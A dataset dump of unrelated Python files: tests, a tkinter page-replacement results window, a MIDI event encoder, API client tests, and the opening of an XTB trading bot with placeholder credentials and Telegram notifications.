repo: ndlib/mellon-search @ 30f7eb267e35d77ee6d126789866d44d825c3e0c | path: test/test_read_embark_fields_json_file.py | licenses: ["Apache-2.0"] (identical across the stars/issues/forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null
# test_read_embark_fields_json_file.py 2/18/19 sm
""" test read_embark_fields_json_file.py """
import json
import unittest
# add parent directory to path
import os
import inspect
import sys
CURRENTDIR = os.path.dirname(os.path.abspath(inspect.getfile(
inspect.currentframe())))
PARENTDIR = os.path.dirname(CURRENTDIR)
sys.path.insert(0, PARENTDIR)
from read_embark_fields_json_file import read_embark_fields_json_file
class Test(unittest.TestCase):
""" Class for test fixtures """
def test_read_embark_fields_json_file(self):
""" run all tests in this module """
filename = PARENTDIR + "/EmbArkXMLFields.json"
resulting_json = read_embark_fields_json_file(filename)
with open(filename, 'r') as input_source:
local_json = json.load(input_source)
input_source.close()
self.assertTrue(local_json == resulting_json)
def test_missing_embark_field_definitions_file(self):
""" test for missing field definitions file """
self.assertRaises(FileNotFoundError, read_embark_fields_json_file,
"./EmbArkXMLFields.jsonx")
def test_invalid_embark_field_definitions_file(self):
""" test for missing field definitions file """
self.assertRaises(json.decoder.JSONDecodeError,
read_embark_fields_json_file,
"./InvalidEmbArkXMLFields.json")
def test_embark_field_definitions_file_missing_field(self):
""" test for missing field definitions file """
self.assertRaises(ValueError, read_embark_fields_json_file,
"./EmbArkXMLFieldsMissingField.json")
def suite():
""" define test suite """
return unittest.TestLoader().loadTestsFromTestCase(Test)
if __name__ == '__main__':
suite()
unittest.main()
stats: avg_line_length=32.839286 | max_line_length=74 | alphanum_fraction=0.694943 | count_classes=1,244 | score_classes=0.676455 | count_generators=0 | score_generators=0 | count_decorators=0 | score_decorators=0 | count_async_functions=0 | score_async_functions=0 | count_documentation=484 | score_documentation=0.263187
hexsha: 1fa0d3c9b6fdeba10b20b2a6b065d708f3d43858 | size: 8,928 | ext: py | lang: Python
repo: Jcollier722/PageRemoval @ ec14cd3927bbb754883a6a3dcff312ba90cd45db | path: menu/show_results.py | licenses: ["Apache-2.0"] (identical across the stars/issues/forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null
"""This file is the results window"""
import sys
sys.path.insert(0, 'menu/')
sys.path.insert(1, 'util/')
sys.path.insert(2, 'sim/')
import tkinter as tk
import menu
import import_jobs as ij
import validate_jobs as validate
import show_results as sr
import export_results as xr
import compare_sim
import const
import simulation
from tkinter import ttk
from tkinter.filedialog import askopenfile
from tkinter.filedialog import asksaveasfile
def make_results(self):
#if job list is too long, just export to spreadsheet and show comparison
if(len(self.job_list)>11):
tk.messagebox.showwarning('Warning','Your job list is large and will be exported to a spreadsheet instead. Please select a save location.')
files = [('Spreadsheet','.xlsx')]
path = asksaveasfile(filetypes = files, defaultextension = files)
xr.export(path,self.fifo_events,self.fifo_inter,self.lru_events,self.lru_inter,self.job_list)
tk.messagebox.showinfo('Saved','Spreadsheet generated successfully')
compare_sim.compare(['FIFO','LRU'],[self.fifo_num_inter,self.lru_num_inter])
return
self.count = self.count + 1
self.window=tk.Toplevel(self)
self.window.geometry("825x900")
self.window.config(bg='#bfd7ff')
self.window.resizable(width=False, height=False)
root = self.window
menu = tk.Canvas(root,width=815,height=const.MAX_HEIGHT/8,bg=const.BLUE,bd=2)
menu.config(highlightbackground='black')
menu.place(relx=0)
#Title
title = tk.Label(menu,text=const.RESULT_TITLE,font='arial 30 bold ',bg=const.BLUE).place(relx=.5,rely=0.40,anchor="center")
fifo_view = tk.Button(menu,text=const.FIFO_TITLE,font='arial 12 bold',height=1,width=10,bg=const.GREEN,command=self.show_fifo).place(relx=0.3,rely=0.75,anchor="w")
lru_view = tk.Button(menu,text=const.LRU_TITLE,font='arial 12 bold',height=1,width=10,bg=const.GREEN,command=self.show_lru).place(relx=0.58,rely=0.75,anchor="w")
compare = tk.Button(root,text="Compare Algorithms",font='arial 12 bold',height=3,width=30,bg=const.GREEN,command=self.compare_sim).place(relx=0.3,rely=0.95,anchor="w")
#**********************************************************************************************************************************************fifo frame
self.fifo = tk.Canvas(root,width=815,height=const.MAX_HEIGHT/1,bg=const.BLUE,bd=2)
fifo = self.fifo
fifo.config(highlightbackground='black')
fifo.place(relx=0,rely=.10)
#fifo title
title = tk.Label(fifo,text=const.FIFO_TITLE,font='arial 20 bold underline',bg=const.BLUE).place(relx=0.01,rely=0.10,anchor="w")
fifo_y = const.START_Y+.10
#print each page frame
for i in range(self.page_frame_count):
this_text = "Page Frame "+str(i+1)
this_label = tk.Label(fifo,text=this_text,font= "arial 15 bold",borderwidth=3,relief='groove',pady=7,padx=10)
this_label.place(relx=0.01,rely=fifo_y)
fifo_y = fifo_y + 0.07
"""
Lots of magic numbers here, will move to const.py if time allows for this assignment.
"""
#print the jobs each page frame has at each moment
y_fifo_jobs = const.START_Y+.10
x_fifo_jobs = self.x+.17
for i in range(self.page_frame_count):
for event_list in self.fifo_events:
if(str(event_list.frame) == str(i+1)):
for e in event_list.event:
if e is None:
e="-"
tk.Label(fifo,text=str(e),font= "arial 10 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_fifo_jobs,rely=y_fifo_jobs)
x_fifo_jobs = x_fifo_jobs + .07
y_fifo_jobs = y_fifo_jobs +0.07
x_fifo_jobs = self.x+.17
#move jobs to right of labels
x_fifo_jobs = self.x+.17
y_fifo_jobs = y_fifo_jobs +0.05
tk.Label(fifo,text=const.REQ,font= "arial 12 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=0.01,rely=y_fifo_jobs)
for job in self.job_list:
tk.Label(fifo,text=str(job),font= "arial 10 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_fifo_jobs,rely=y_fifo_jobs)
x_fifo_jobs = x_fifo_jobs + .07
x_fifo_jobs = self.x+.17
y_fifo_jobs=y_fifo_jobs +0.07
tk.Label(fifo,text=const.INTER,font= "arial 12 bold",borderwidth=3,relief='groove',pady=7,padx=40).place(relx=0.01,rely=y_fifo_jobs)
for inter in self.fifo_inter:
tk.Label(fifo,text=str(inter),font= "arial 13 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_fifo_jobs,rely=y_fifo_jobs)
x_fifo_jobs = x_fifo_jobs + .07
y_fifo_jobs=y_fifo_jobs +0.07
x_fifo_jobs = self.x+.17
tk.Label(fifo,text=const.TIME,font= "arial 12 bold",borderwidth=3,relief='groove',pady=7,padx=15).place(relx=0.01,rely=y_fifo_jobs)
for i in range(len(self.job_list)):
tk.Label(fifo,text=str(i+1),font= "arial 11 ",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_fifo_jobs,rely=y_fifo_jobs)
x_fifo_jobs = x_fifo_jobs + .07
y_fifo_jobs=y_fifo_jobs +0.07
y_fifo_jobs=y_fifo_jobs +0.07
num_inter = str((self.fifo_num_inter))
num_req = str(len(self.job_list))
fifo_fail = str(self.fifo_fail*100)+"%"
results = "Total Interrupts: "+num_inter+"\n"+"Total Requests: "+ num_req + "\n" + "Failure Rate: "+fifo_fail
tk.Label(fifo,text=results,font= "arial 15 bold ").place(relx=0.01,rely=y_fifo_jobs)
#**********************************************************************************************************************************************lru frame
self.lru = tk.Canvas(root,width=815,height=const.MAX_HEIGHT/1,bg=const.BLUE,bd=2)
lru = self.lru
lru.config(highlightbackground='black')
#lru.place(relx=0,rely=.10)
#lru title
title = tk.Label(lru,text=const.LRU_TITLE,font='arial 20 bold underline',bg=const.BLUE).place(relx=0.01,rely=0.10,anchor="w")
lru_y = const.START_Y+.10
#print each page frame
for i in range(self.page_frame_count):
this_text = "Page Frame "+str(i+1)
this_label = tk.Label(lru,text=this_text,font= "arial 15 bold",borderwidth=3,relief='groove',pady=7,padx=10)
this_label.place(relx=0.01,rely=lru_y)
lru_y = lru_y + 0.07
"""
Lots of magic numbers here, will move to const.py if time allows for this assignment.
"""
#print the jobs each page frame has at each moment
y_lru_jobs = const.START_Y+.10
x_lru_jobs = self.x+.17
for i in range(self.page_frame_count):
for event_list in self.lru_events:
if(str(event_list.frame) == str(i+1)):
for e in event_list.event:
if e is None:
e="-"
tk.Label(lru,text=str(e),font= "arial 10 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_lru_jobs,rely=y_lru_jobs)
x_lru_jobs = x_lru_jobs + .07
y_lru_jobs = y_lru_jobs +0.07
x_lru_jobs = self.x+.17
#move jobs to right of labels
x_lru_jobs = self.x+.17
y_lru_jobs = y_lru_jobs +0.05
tk.Label(lru,text=const.REQ,font= "arial 12 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=0.01,rely=y_lru_jobs)
for job in self.job_list:
tk.Label(lru,text=str(job),font= "arial 10 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_lru_jobs,rely=y_lru_jobs)
x_lru_jobs = x_lru_jobs + .07
x_lru_jobs = self.x+.17
y_lru_jobs=y_lru_jobs +0.07
tk.Label(lru,text=const.INTER,font= "arial 12 bold",borderwidth=3,relief='groove',pady=7,padx=40).place(relx=0.01,rely=y_lru_jobs)
for inter in self.lru_inter:
tk.Label(lru,text=str(inter),font= "arial 13 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_lru_jobs,rely=y_lru_jobs)
x_lru_jobs = x_lru_jobs + .07
y_lru_jobs=y_lru_jobs +0.07
x_lru_jobs = self.x+.17
tk.Label(lru,text=const.TIME,font= "arial 12 bold",borderwidth=3,relief='groove',pady=7,padx=15).place(relx=0.01,rely=y_lru_jobs)
for i in range(len(self.job_list)):
tk.Label(lru,text=str(i+1),font= "arial 11 ",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_lru_jobs,rely=y_lru_jobs)
x_lru_jobs = x_lru_jobs + .07
y_lru_jobs=y_lru_jobs +0.07
y_lru_jobs=y_lru_jobs +0.07
num_inter = str((self.lru_num_inter))
num_req = str(len(self.job_list))
lru_fail = str(self.lru_fail*100)+"%"
results = "Total Interrupts: "+num_inter+"\n"+"Total Requests: "+ num_req + "\n" + "Failure Rate: "+lru_fail
tk.Label(lru,text=results,font= "arial 15 bold ").place(relx=0.01,rely=y_lru_jobs)
stats: avg_line_length=46.020619 | max_line_length=172 | alphanum_fraction=0.635529 | count_classes=0 | score_classes=0 | count_generators=0 | score_generators=0 | count_decorators=0 | score_decorators=0 | count_async_functions=0 | score_async_functions=0 | count_documentation=1,841 | score_documentation=0.206205
hexsha: 1fa185f55ac389ddda6ff7507b5d50529d297d77 | size: 539 | ext: py | lang: Python
repo: eddowh/flask-react-gae-multiuser-blog @ 7979567455936d32ba55c6edf0df82c4670754ef | path: index.py | licenses: ["Unlicense"] (identical across the stars/issues/forks column groups)
max_stars_count: 1 (2016-10-25T10:12:58.000Z) | max_issues_count: null | max_forks_count: null
# -*- coding: utf-8 -*-
from importlib import import_module
import os
import sys
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
APP_NAME = 'server'
SYS_DIRS = [
'lib',
]
# add directories to sys path
for dir in SYS_DIRS + [APP_NAME]:
sys.path.insert(1, os.path.join(BASE_PATH, dir))
# register flask configuration environment variable
SETTINGS_FILEPATH = os.path.join(BASE_PATH, 'priv.cfg')
os.environ.setdefault("FLASK_CONF", SETTINGS_FILEPATH)
# for starting GAE
globals().update(import_module(APP_NAME).__dict__)
stats: avg_line_length=21.56 | max_line_length=55 | alphanum_fraction=0.742115 | count_classes=0 | score_classes=0 | count_generators=0 | score_generators=0 | count_decorators=0 | score_decorators=0 | count_async_functions=0 | score_async_functions=0 | count_documentation=156 | score_documentation=0.289425
hexsha: 1fa2167771953e0aff81f31c29233d456380649d | size: 67 | ext: py | lang: Python
repo: AntonObersteiner/python-lessons @ 1d5536f0777853fba437566672cfb1d613984945 | path: latex/slides/resources/01_getting_started/present_main.py | licenses: ["CC-BY-4.0"] (identical across the stars/issues/forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null
print(present("Py-Kurs", "am Di in der 5.", "dem FSR-Kurssystem"))
stats: avg_line_length=33.5 | max_line_length=66 | alphanum_fraction=0.656716 | count_classes=0 | score_classes=0 | count_generators=0 | score_generators=0 | count_decorators=0 | score_decorators=0 | count_async_functions=0 | score_async_functions=0 | count_documentation=46 | score_documentation=0.686567
hexsha: 1fa40e3d5ffd5031f4b30a989255c4474dd77b5f | size: 9,440 | ext: py | lang: Python
repo: agurdins/RTU_Bachelor @ 28ed4bf90a8ffdb2b599e549bae5f2b12a795ff1 | path: POP909-Dataset-master/data_process/processor.py | licenses: ["Apache-2.0"] (identical across the stars/issues/forks column groups)
max_stars_count: 140 (2020-08-06T12:15:56.000Z to 2022-03-26T11:02:36.000Z) | max_issues_count: 5 (2020-08-18T08:29:46.000Z to 2021-09-25T16:56:49.000Z) | max_forks_count: 18 (2020-09-21T07:13:44.000Z to 2022-03-19T14:30:09.000Z)
"""
Representation Processor
============
These are core classes of representation processor.
Repr Processor: the basic representation processor
- Event Processor
"""
import numpy as np
from abc import ABC, abstractmethod
import pretty_midi as pyd
class ReprProcessor(ABC):
"""Abstract base class severing as the representation processor.
It provides the following abstract methods.
- encode(self, note_seq): encode the note sequence into the representation sequence.
- decode(self, repr_seq): decode the representation sequence into the note sequence.
Notes
-----
The base representation processor class includes the conversion between the note sequence and the representation sequence.
In general, we assume the input note sequence has already been quantized.
That is, the smallest unit of the quantization is 1 tick, no matter what the resolution is.
If you init "min_step" to be larger than 1, we assume you wish to compress the base ticks.
e.g. with min_step = 2, all tick values are halved.
If you do this, the representation conversion may not be 100% correct.
-----
"""
def __init__(self, min_step: int = 1):
self.min_step = min_step
def _compress(self, note_seq=None):
"""Return the compressed note_seq based on the min_step > 1.
Parameters
----------
note_seq : Note Array.
----------
WARNING: If you do this, the representation conversion may not be 100% correct.
"""
new_note_seq = [
pyd.Note(
start=int(d.start / self.min_step),
end=int(d.end / self.min_step),
pitch=d.pitch,
velocity=d.velocity,
)
for d in note_seq
]
return new_note_seq
def _expand(self, note_seq=None):
"""Return the expanded note_seq based on the min_step > 1.
Parameters
----------
note_seq : Note Array.
----------
WARNING: If you do this, the representation conversion may not be 100% correct.
"""
new_note_seq = [
pyd.Note(
start=int(d.start * self.min_step),
end=int(d.end * self.min_step),
pitch=d.pitch,
velocity=d.velocity,
)
for d in note_seq
]
return new_note_seq
@abstractmethod
def encode(self, note_seq=None):
"""encode the note sequence into the representation sequence.
Parameters
----------
note_seq= the input {Note} sequence
Returns
----------
repr_seq: the representation numpy sequence
"""
@abstractmethod
def decode(self, repr_seq=None):
"""decode the representation sequence into the note sequence.
Parameters
----------
repr_seq: the representation numpy sequence
Returns
----------
note_seq= the input {Note} sequence
"""
class MidiEventProcessor(ReprProcessor):
"""Midi Event Representation Processor.
Representation Format:
-----
Size: L * D:
- L for the sequence (event) length
- D = 1 {
0-127: note-on event,
128-255: note-off event,
256-355(default):
tick-shift event
256 for one tick, 355 for 100 ticks
the maximum number of tick-shift can be specified
356-388 (default):
velocity event
the maximum number of quantized velocity can be specified
}
Parameters:
-----
min_step(optional):
minimum quantification step
decide how many ticks to be the basic unit (default = 1)
tick_dim(optional):
tick-shift event dimensions
the maximum number of tick-shift (default = 100)
velocity_dim(optional):
velocity event dimensions
the maximum number of quantized velocity (default = 32, max = 128)
e.g.
[C5 - - - E5 - - / G5 - - / /]
->
[380, 60, 259, 188, 64, 258, 192, 256, 67, 258, 195, 257]
"""
def __init__(self, **kwargs):
self.name = "midievent"
min_step = 1
if "min_step" in kwargs:
min_step = kwargs["min_step"]
super(MidiEventProcessor, self).__init__(min_step)
self.tick_dim = 100
self.velocity_dim = 32
if "tick_dim" in kwargs:
self.tick_dim = kwargs["tick_dim"]
if "velocity_dim" in kwargs:
self.velocity_dim = kwargs["velocity_dim"]
if self.velocity_dim > 128:
raise ValueError(
"velocity_dim cannot be larger than 128", self.velocity_dim
)
self.max_vocab = 256 + self.tick_dim + self.velocity_dim
self.start_index = {
"note_on": 0,
"note_off": 128,
"time_shift": 256,
"velocity": 256 + self.tick_dim,
}
def encode(self, note_seq=None):
"""Return the note token
Parameters
----------
note_seq : Note List.
Returns
----------
repr_seq: Representation List
"""
if note_seq is None:
return []
if self.min_step > 1:
note_seq = self._compress(note_seq)
notes = note_seq
events = []
meta_events = []
for note in notes:
token_on = {
"name": "note_on",
"time": note.start,
"pitch": note.pitch,
"vel": note.velocity,
}
token_off = {
"name": "note_off",
"time": note.end,
"pitch": note.pitch,
"vel": None,
}
meta_events.extend([token_on, token_off])
meta_events.sort(key=lambda x: x["pitch"])
meta_events.sort(key=lambda x: x["time"])
time_shift = 0
cur_vel = 0
for me in meta_events:
duration = int((me["time"] - time_shift) * 100)
while duration >= self.tick_dim:
events.append(
self.start_index["time_shift"] + self.tick_dim - 1
)
duration -= self.tick_dim
if duration > 0:
events.append(self.start_index["time_shift"] + duration - 1)
if me["vel"] is not None:
if cur_vel != me["vel"]:
cur_vel = me["vel"]
events.append(
self.start_index["velocity"]
+ int(round(me["vel"] * self.velocity_dim / 128))
)
events.append(self.start_index[me["name"]] + me["pitch"])
time_shift = me["time"]
return events
def decode(self, repr_seq=None):
"""Return the note seq
Parameters
----------
repr_seq: Representation Sequence List
Returns
----------
note_seq : Note List.
"""
if repr_seq is None:
return []
time_shift = 0.0
cur_vel = 0
meta_events = []
note_on_dict = {}
notes = []
for e in repr_seq:
if self.start_index["note_on"] <= e < self.start_index["note_off"]:
token_on = {
"name": "note_on",
"time": time_shift,
"pitch": e,
"vel": cur_vel,
}
meta_events.append(token_on)
if (
self.start_index["note_off"]
<= e
< self.start_index["time_shift"]
):
token_off = {
"name": "note_off",
"time": time_shift,
"pitch": e - self.start_index["note_off"],
"vel": cur_vel,
}
meta_events.append(token_off)
if (
self.start_index["time_shift"]
<= e
< self.start_index["velocity"]
):
time_shift += (e - self.start_index["time_shift"] + 1) * 0.01
if self.start_index["velocity"] <= e < self.max_vocab:
cur_vel = int(round(
(e - self.start_index["velocity"])
* 128
/ self.velocity_dim)
)
skip_notes = []
for me in meta_events:
if me["name"] == "note_on":
note_on_dict[me["pitch"]] = me
elif me["name"] == "note_off":
try:
token_on = note_on_dict[me["pitch"]]
token_off = me
if token_on["time"] == token_off["time"]:
continue
notes.append(
pyd.Note(
velocity=token_on["vel"],
pitch=int(token_on["pitch"]),
start=token_on["time"],
end=token_off["time"],
)
)
except:
skip_notes.append(me)
notes.sort(key=lambda x: x.start)
if self.min_step > 1:
notes = self._expand(notes)
return notes
stats: avg_line_length=30.550162 | max_line_length=126 | alphanum_fraction=0.500953 | count_classes=9,177 | score_classes=0.97214 | count_generators=0 | score_generators=0 | count_decorators=612 | score_decorators=0.064831 | count_async_functions=0 | score_async_functions=0 | count_documentation=4,065 | score_documentation=0.430614
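
A minimal round-trip sketch for the MidiEventProcessor defined above (assumes pretty_midi is installed and the class is in scope; the two notes are made up for illustration):

import pretty_midi as pyd

proc = MidiEventProcessor(tick_dim=100, velocity_dim=32)
notes = [
    pyd.Note(velocity=100, pitch=60, start=0.0, end=0.5),
    pyd.Note(velocity=100, pitch=64, start=0.5, end=1.0),
]
events = proc.encode(notes)      # integer event tokens (note-on/off, time-shift, velocity)
recovered = proc.decode(events)  # back to pretty_midi Note objects
print(len(events), len(recovered))
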
hexsha: 1fa55ad9cf461decaa935b9ad2c9830d3dd93f16 | size: 5,521 | ext: py | lang: Python
repo: lukeshiner/ccp_api @ 5bd8a075108df4983b62197ea950e14297f5ad19 | path: tests/test_products.py | licenses: ["MIT"] (identical across the stars/issues/forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null
import ccp_api
import pytest
from .test_ccp_api import Base_ccp_api_Test
class TestProducts(Base_ccp_api_Test):
@pytest.fixture
def products_wsdl(self, file_fixture):
return file_fixture("products", "wsdl.xml")
@pytest.fixture
def product_by_ID_response(self, file_fixture):
return file_fixture("products", "get_product_by_ID_response.xml")
@pytest.fixture
def get_product_by_ID_failed_response(self, file_fixture):
return file_fixture("products", "get_product_by_ID_failed_response.xml")
@pytest.fixture
def product_by_SKU_response(self, file_fixture):
return file_fixture("products", "get_product_by_SKU_response.xml")
@pytest.fixture
def get_product_by_SKU_empty_response(self, file_fixture):
return file_fixture("products", "get_product_by_SKU_empty_response.xml")
@pytest.fixture
def product_by_barcode_response(self, file_fixture):
return file_fixture("products", "get_product_by_barcode_response.xml")
@pytest.fixture
def get_products_by_barcode_empty_response(self, file_fixture):
return file_fixture("products", "get_products_by_barcode_empty_response.xml")
@pytest.fixture
def get_active_sales_channels_response(self, file_fixture):
return file_fixture("products", "get_active_sales_channels_response.xml")
@pytest.fixture
def get_product_images_response(self, file_fixture):
return file_fixture("products", "get_product_images_response.xml")
@pytest.fixture
def get_product_images_empty_response(self, file_fixture):
return file_fixture("products", "get_product_images_empty_response.xml")
@pytest.fixture
def set_external_product_ID_response(self, file_fixture):
return file_fixture("products", "set_external_product_ID_response.xml")
class Test_get_product_by_ID(TestProducts):
def test_product_by_ID_returns_a_product(
self, mock_product_method, product_by_ID_response
):
mock_product_method(text=product_by_ID_response)
response = ccp_api.products.get_product_by_ID("1234864")
assert response.Name == "Ladies Hooded Cotton Terry Towelling Robe"
def test_get_product_by_ID_raises_when_no_product_matches(
self, mock_product_method, get_product_by_ID_failed_response
):
mock_product_method(text=get_product_by_ID_failed_response, status_code=500)
with pytest.raises(ccp_api.exceptions.ResponseError):
ccp_api.products.get_product_by_ID("1234864")
class Test_get_product_by_SKU(TestProducts):
def test_product_by_SKU_returns_a_product(
self, mock_product_method, product_by_SKU_response
):
mock_product_method(text=product_by_SKU_response)
response = ccp_api.products.get_product_by_SKU("ABC_DEF_GHI")
assert response.Name == "Ladies Hooded Cotton Terry Towelling Robe"
def test_get_product_by_SKU_returns_None_when_no_match_is_found(
self, mock_product_method, get_product_by_SKU_empty_response
):
mock_product_method(text=get_product_by_SKU_empty_response)
response = ccp_api.products.get_product_by_SKU("ABC_DEF_GHI")
assert response is None
class Test_get_product_by_barcode(TestProducts):
def test_product_by_barcode_returns_a_product(
self, mock_product_method, product_by_barcode_response
):
mock_product_method(text=product_by_barcode_response)
response = ccp_api.products.get_product_by_barcode("7106544676954")
assert response.Name == "Ladies Hooded Cotton Terry Towelling Robe"
def test_get_product_by_barcode_returns_None_when_no_match_is_found(
self, mock_product_method, get_products_by_barcode_empty_response
):
mock_product_method(text=get_products_by_barcode_empty_response)
response = ccp_api.products.get_product_by_barcode("7106544676954")
assert response is None
class Test_get_product_by_get_active_sales_channels(TestProducts):
def test_get_active_sales_channels_returns_sales_channels_information(
self, mock_product_method, get_active_sales_channels_response
):
mock_product_method(text=get_active_sales_channels_response)
response = ccp_api.products.get_active_sales_channels()
assert response[0].ID == 3541
class Test_get_product_images(TestProducts):
def test_get_product_images_returns_product_image_information(
self, mock_product_method, get_product_images_response
):
mock_product_method(text=get_product_images_response)
response = ccp_api.products.get_product_images("1234864")
assert response[0].ID == 14601918
def test_get_product_images_returns_empty_list_when_no_images_exist(
self, mock_product_method, get_product_images_empty_response
):
mock_product_method(text=get_product_images_empty_response)
returned_value = ccp_api.products.get_product_images("1234864")
assert returned_value == []
class Test_set_external_product_id(TestProducts):
def test_set_external_product_id(
self,
mock_product_method,
product_by_ID_response,
set_external_product_ID_response,
):
mock_product_method(text=product_by_ID_response)
product = ccp_api.products.get_product_by_ID("1234864")
mock_product_method(text=set_external_product_ID_response)
response = ccp_api.products.set_external_product_ID(product, "a001")
assert response is True
stats: avg_line_length=40.007246 | max_line_length=85 | alphanum_fraction=0.768339 | count_classes=5,426 | score_classes=0.982793 | count_generators=0 | score_generators=0 | count_decorators=1,656 | score_decorators=0.299946 | count_async_functions=0 | score_async_functions=0 | count_documentation=730 | score_documentation=0.132222
hexsha: 1fa567e6eb55b654152cc249c03df4836f9c4a5f | size: 340 | ext: py | lang: Python
repo: yujiecong/yjcL @ 6d6dc4ad3611cb34c07192a1a3038a1ac3f67d6c | path: restart/TokenyjcL/Float.py | licenses: ["MIT"] (identical across the stars/issues/forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
@IDE :PyCharm
@Project :yjcL
@USER :yanyin
@File :Float.py
@Author :yujiecong
@Date :2021/9/1 16:19
'''
from restart.TokenyjcL.Token import Token_yjcL
class Float_yjcL(Token_yjcL):
def __init__(self,valueDict):
super(Float_yjcL, self).__init__(valueDict)
stats: avg_line_length=21.25 | max_line_length=51 | alphanum_fraction=0.652941 | count_classes=115 | score_classes=0.338235 | count_generators=0 | score_generators=0 | count_decorators=0 | score_decorators=0 | count_async_functions=0 | score_async_functions=0 | count_documentation=173 | score_documentation=0.508824
hexsha: 1fa5b81e8ddb69f6e5c8f48345327239689cae22 | size: 19,461 | ext: py | lang: Python
repo: lemassykoi/XTBApi @ 3b159f0b711e0d445a9cd7fec5c7a499cc623140 | path: xtb_trading.py | licenses: ["MIT"] (identical across the stars/issues/forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null
#!/usr/bin/env python3
# adaptation of the FXCM script for XTB
##
debug = 1 ## DEBUG ENABLED OR DISABLED
from XTBApi.api import *
import time
import pandas as pd
import datetime as dt
import talib.abstract as ta
## Maths modules
import pyti.bollinger_bands as bb
from pyti.relative_strength_index import relative_strength_index as rsi
from pyti.bollinger_bands import upper_bollinger_band as ubb
from pyti.bollinger_bands import middle_bollinger_band as mbb
from pyti.bollinger_bands import lower_bollinger_band as lbb
from pyti.bollinger_bands import percent_bandwidth as percent_b
import requests
import sys, traceback
from os import system
from pprint import pprint
##
## SPINNER FUNC
##
import threading
import itertools
class Spinner:
def __init__(self, message, delay=0.05):
#self.spinner = itertools.cycle(['-', '/', '|', '\\']) # counter-clockwise
self.spinner = itertools.cycle(['-', '\\', '|', '/']) # clockwise
self.delay = delay
self.busy = False
self.spinner_visible = False
sys.stdout.write(message)
def write_next(self):
with self._screen_lock:
if not self.spinner_visible:
sys.stdout.write(next(self.spinner))
self.spinner_visible = True
sys.stdout.flush()
def remove_spinner(self, cleanup=False):
with self._screen_lock:
if self.spinner_visible:
sys.stdout.write('\b')
self.spinner_visible = False
if cleanup:
sys.stdout.write(' ') # overwrite spinner with blank
sys.stdout.write('\r') # return the cursor to the start of the line
sys.stdout.flush()
def spinner_task(self):
while self.busy:
self.write_next()
time.sleep(self.delay)
self.remove_spinner()
def __enter__(self):
if sys.stdout.isatty():
self._screen_lock = threading.Lock()
self.busy = True
self.thread = threading.Thread(target=self.spinner_task)
self.thread.start()
def __exit__(self, exception, value, tb):
if sys.stdout.isatty():
self.busy = False
self.remove_spinner(cleanup=True)
else:
sys.stdout.write('\r')
##
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def NotifyLogDebug(Message):
LOGGER.debug(Message)
requests.get('https://api.telegram.org/bot' + TG_token + '/sendMessage?chat_id=' + TG_chat_id + '&text=' + Message)
def NotifyLogInfo(Message):
LOGGER.info(Message)
requests.get('https://api.telegram.org/bot' + TG_token + '/sendMessage?chat_id=' + TG_chat_id + '&text=' + Message)
def NotifyLogWarning(Message):
LOGGER.warning(Message)
requests.get('https://api.telegram.org/bot' + TG_token + '/sendMessage?chat_id=' + TG_chat_id + '&text=' + Message)
def NotifyLogError(Message):
LOGGER.error(Message)
requests.get('https://api.telegram.org/bot' + TG_token + '/sendMessage?chat_id=' + TG_chat_id + '&text=' + Message)
def NotifyLogCritical(Message):
LOGGER.critical(Message)
requests.get('https://api.telegram.org/bot' + TG_token + '/sendMessage?chat_id=' + TG_chat_id + '&text=' + Message)
def NormalExit():
client.logout()
LOGGER.info('Logged Out : Script Exited Normally')
sys.exit()
if debug == 1: print(f"{bcolors.WARNING} DEBUG IS ON{bcolors.ENDC}")
## LOGGER LEVEL
LOGGER.setLevel(logging.INFO)
##
pricedata = None
timeframe = 'm1' ## TIMEFRAME (m1, m5, m15, m30, H1,H2,H3,H4,H6,H8,D1, W1, M1)
mn_timeframe = 60 ## Seconds (60, 300, 900, 1800, 3600, 14400, 86400, 604800, 2592000)
numberofcandles = 300 ## minimum 35 pour calcul MACD
symbol = 'EURUSD'
xtb_login = '1234567'
xtb_pass = 'myComplexPassword'
TG_chat_id='123456789'
TG_token='1234567890:aBcDeFgHiJkLmNoPqRsTuVwXyZ012345678'
amount = 0.1
objectif_percent_sell = 1.02
objectif_percent_buy = 0.98
min_objectif_amount_sell = 50
trailing_step = 150
##
rsi_periods = 14
bb_periods = 20
bb_standard_deviations = 2.0
upper_rsi = 72
lower_rsi = 28
version = '20210127-0110'
## INIT XTB CONNEXION
NotifyLogInfo('Starting XTB Bot Tests')
client = Client()
client.login(xtb_login, xtb_pass, mode='real')
## Check if Market is Opened or Closed # return an array with 'symbol : Bool'
is_opened = client.check_if_market_open([symbol])
if is_opened[symbol] == False:
print('==MARKET IS CLOSED==')
NormalExit()
# This function runs once at the beginning of the strategy to run initial one-time processes
def Prepare():
global pricedata
if debug == 1: print(f"{bcolors.HEADER}Requesting Initial Price Data...{bcolors.ENDC}")
d = client.get_lastn_candle_history([symbol], mn_timeframe, numberofcandles)
pricedata = pd.DataFrame(data=d)
if debug == 1: print(f"{bcolors.OKGREEN}Initial Price Data Received...{bcolors.ENDC}")
print('')
## DEBUG LIGHT
#print(pricedata)
## DEBUG FULL
#print(pricedata.to_string())
print('')
# Get latest close bar prices and run Update() function every close of bar/candle
def StrategyHeartBeat():
while True:
currenttime = dt.datetime.now()
if timeframe == "m1" and currenttime.second == 0 and getLatestPriceData():
Update()
